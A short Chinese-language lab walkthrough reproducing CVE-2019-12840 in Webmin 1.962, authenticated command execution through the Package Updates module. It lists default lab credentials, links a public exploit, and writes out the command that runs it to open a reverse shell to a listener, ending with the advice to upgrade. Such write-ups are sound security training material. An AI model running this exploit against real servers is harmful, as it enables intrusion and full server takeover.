漏洞描述:
Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。 账户密码:root:password
复现过程:
1.访问https://ip:port,出现如下页面,开始实验
2.建立监听端口
3.下载exp,并修改文件内容
https://github.com/KrE80r/webmin_cve-2019-12840_poc
使用前注意修改py文件中的121行的目标端口号和122行的监听端口号
4.运行exp
python3 CVE-2019-12840.py -u https://ip (目标ip) -p port(目标端口) -U root -P password -lhost ip(监听ip) -lport port(监听端口)
5.成功监听
如此即可继承Web服务器程序的权限,去执行系统命令或读写文件,通过反弹shell控制整个网站,甚至控制整个服务器。
修复建议:
1.升级版本。